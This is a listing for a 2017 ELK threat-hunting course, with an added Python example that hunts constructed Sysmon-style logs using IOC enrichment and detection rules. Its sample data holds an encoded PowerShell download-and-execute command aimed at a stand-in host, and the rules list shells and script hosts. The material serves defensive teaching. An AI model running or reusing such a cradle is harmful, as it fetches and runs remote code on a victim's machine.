
Threat Hunting with ELK Hands-On

On 06/04/17
Categories: USA, Florida
Tags: Conference

Thursday, April 6, 2017 
9:00 AM – 5:00 PM
One-Day, 8 CPEs
Fred Mastrippolito, President & CEO, Polito, Inc.
Ben Hughes, Senior Security Engineer, Polito, Inc.

Successful log analysis is a cornerstone of any network or endpoint security program. Whether your organization relies primarily on "next-gen" commercial security appliances or on free security solutions, these tools typically generate logs at scale that need to be collected, managed, tuned, enriched, monitored, analyzed, correlated, and reported on. Even if your organization has no "next-gen" security monitoring solution at the network perimeter or on endpoints, and perhaps no commercial SIEM, open source or otherwise free alternatives can be deployed rapidly to provide inexpensive yet effective security log monitoring and threat hunting capabilities.
This hands-on class will walk attendees through the basics of how to leverage the open source ELK stack to analyze diverse logs, both automatically and by hand, and proactively identify malicious activity. The tools, techniques, and procedures taught during this class can be used to investigate isolated endpoint security incidents or implemented at scale to monitor an enterprise. Students will be given access to a preconfigured ELK instance in the cloud, along with extensive sample logs containing malicious events waiting to be discovered.
This course is designed for entry- to mid-level security analysts and managers. Students who complete this class will leave with practical tools and techniques for understanding, deploying, and leveraging log monitoring and analysis tools in support of enterprise defense efforts.
This Class Will Cover:

• Introduction to log monitoring and analysis
  o Security Information and Event Management (SIEM)
  o Different types of event logs
  o Log ingestion, indexing, and searching
  o Log correlation and enrichment using additional data sources
  o How network perimeter and endpoint security logs complement each other
• Introduction to threat hunting
  o Where threat hunting fits into your security program
  o Proactive monitoring/hunting vs. dead-box forensics
  o Understanding the malware kill chain
  o The role of threat intelligence
  o Identifying and hunting for Indicators of Compromise (IOCs)
• Relevant tools (mostly open source or otherwise free):
  o ELK stack (popular open source log management platform)
  o Elasticsearch (index and search)
  o Logstash (log ingestion)
  o Kibana (search and dashboard frontend)
  o Sysmon (free Microsoft Sysinternals endpoint logging tool)
• Threat hunting with logs
  o How to search logs to find anomalous/malicious events
  o How to build and use dashboards, automation, and alerting capabilities
  o How to integrate threat intelligence feeds and enrich data
• Next steps
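The syllabus items on IOC hunting, enrichment with threat intelligence, and searching Sysmon logs for anomalous events come together in the small hunting pass below. It is an added example written for this page, not material from the course or from Polito, Inc., and it is plain Python rather than Logstash/Kibana configuration so it runs offline. Everything in it is constructed: the flattened event shape (loosely modelled on Sysmon Event ID 1 process-create and Event ID 3 network-connect records after shipping into Elasticsearch), the field names, the hashes, the IP addresses, and the "threat intel feed" are all assumptions for illustration, not the Sysmon schema or real indicators. The `enrich` step does what a Logstash translate filter does with an IOC lookup table; the two behavioural checks (Office application spawning a shell, Base64-encoded PowerShell) are the kind of saved search a hunter would pin to a Kibana dashboard.

```python
"""Constructed Sysmon-style events plus a tiny hunting/enrichment pass.

ASSUMPTIONS: the event dict layout, field names, hashes and IPs are made up
for this example. They approximate Sysmon Event ID 1 (process create) and
Event ID 3 (network connect) records after ingestion, not the real schema.
"""
import base64
import re

# Constructed IOC lookup table, standing in for a threat-intel feed loaded
# into a Logstash translate filter or an Elasticsearch enrich policy.
BAD_HASH = "0f1e2d3c" * 8           # fake SHA-256, 64 hex chars
INTEL = {
    "sha256": {BAD_HASH: "example-rat-dropper"},
    "ip": {"203.0.113.77": "example-c2-node"},   # TEST-NET-3, never routable
}

# Parent/child pairs that are rarely legitimate: Office apps spawning shells.
OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# powershell -e / -enc / -EncodedCommand <base64>; group(1) is the payload.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|enc|encodedcommand)\s+(\S+)")


def basename(path):
    """Lower-cased file name from a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def enrich(event):
    """Attach IOC context to an event, the way a translate filter would.
    Adds a 'threat' list only when an indicator matched; returns the event."""
    hits = []
    sha = (event.get("hashes") or {}).get("sha256")
    if sha and sha.lower() in INTEL["sha256"]:
        hits.append({"indicator_type": "sha256", "name": INTEL["sha256"][sha.lower()]})
    dst = event.get("destination_ip")
    if dst in INTEL["ip"]:
        hits.append({"indicator_type": "ip", "name": INTEL["ip"][dst]})
    if hits:
        event["threat"] = hits
    return event


def hunt(events):
    """Enrich every event, then apply two behavioural rules to process creates.
    Returns a list of (rule_name, enriched_event) findings."""
    findings = []
    for raw in events:
        ev = enrich(dict(raw))
        if "threat" in ev:
            findings.append(("ioc_match", ev))
        if ev.get("event_id") != 1:
            continue
        parent = basename(ev.get("parent_image", ""))
        child = basename(ev.get("image", ""))
        if parent in OFFICE and child in SHELLS:
            findings.append(("office_spawns_shell", ev))
        m = ENCODED_FLAG.search(ev.get("command_line", ""))
        if m:
            # PowerShell expects UTF-16LE inside the Base64; decode it so the
            # hunter sees the real command, not the blob.
            try:
                ev["decoded_command"] = base64.b64decode(m.group(1)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                ev["decoded_command"] = None
            findings.append(("encoded_powershell", ev))
    return findings


# Constructed sample telemetry (not real events). The encoded payload is built
# here so the example never hard-codes a hand-typed Base64 string.
ENC = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')"
    .encode("utf-16-le")).decode()
EVENTS = [
    {"event_id": 1, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs", "hashes": {"sha256": "aa" * 32}},
    {"event_id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell.exe -nop -w hidden -enc " + ENC,
     "hashes": {"sha256": "bb" * 32}},
    {"event_id": 3, "image": r"C:\Users\Public\update.exe",
     "destination_ip": "203.0.113.77", "destination_port": 443},
    {"event_id": 1, "image": r"C:\Users\Public\update.exe",
     "parent_image": r"C:\Windows\explorer.exe", "command_line": "update.exe",
     "hashes": {"sha256": BAD_HASH}},
]

if __name__ == "__main__":
    for rule, ev in hunt(EVENTS):
        print(rule, "->", ev.get("image"), ev.get("threat") or ev.get("decoded_command", ""))
```

The benign svchost.exe event produces nothing; the Word-spawned PowerShell fires two rules (parent/child and encoded command, with the decoded one-liner attached), and the two update.exe events are caught only because enrichment ran first: a plain search on the raw fields would never have surfaced them. That ordering (enrich on ingest, then hunt on the enriched fields) is the point of pairing Logstash lookups with Kibana searches.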

Students must bring a Windows, Mac, or Linux laptop with at least 6 GB of RAM and a web browser. Previous experience with log analysis, threat hunting, malware analysis, forensics, network security monitoring, and/or threat intelligence is helpful but not required.